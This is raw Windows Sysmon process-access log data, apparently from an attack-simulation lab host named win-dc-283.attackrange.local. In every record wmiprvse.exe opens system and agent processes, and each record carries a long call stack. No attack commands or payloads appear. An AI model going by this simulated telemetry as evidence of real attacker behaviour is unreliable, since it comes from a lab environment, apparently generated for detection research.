15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program 